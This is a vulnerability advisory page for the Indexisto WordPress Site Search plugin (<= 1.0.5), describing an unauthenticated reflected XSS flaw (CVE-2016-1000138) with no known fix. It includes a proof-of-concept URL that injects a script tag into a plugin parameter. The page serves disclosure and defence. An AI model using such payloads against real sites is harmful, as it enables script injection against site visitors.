WordPress Plugin Vulnerabilities

Indexisto WordPress Site Search <= 1.0.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The indexisto WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"

Affects Plugins

Plugin icon
indexisto
No known fix

References

CVE
CVE-2016-1000138
URL
http://www.vapidlabs.com/wp/wp_advisory.php?v=38
URL
https://www.openwall.com/lists/oss-security/2016/04/12/8

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
ethicalhack3r
Verified
No
WPVDB ID
6d8bbbd3-a1e2-4a45-a515-2f44f028ea06

Timeline

Publicly Published
2016-04-12 (about 8 years ago)
Added
2016-04-15 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other

Published
Title
Published
2017-04-26
Title
Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF
Published
2022-03-15
Title
Super Socializer < 7.13.30 - Reflected Cross-Site Scripting
Published
2014-10-30
Title
Profile Builder < 2.0.3 - Reflected Cross-Site Scripting (XSS)
Published
2024-02-20
Title
YARPP < 5.30.10 - Admin+ Stored XSS
Published
2014-08-01
Title
WP Socializer 2.4.2 - admin/wpsr-services-selector.php val Parameter XSS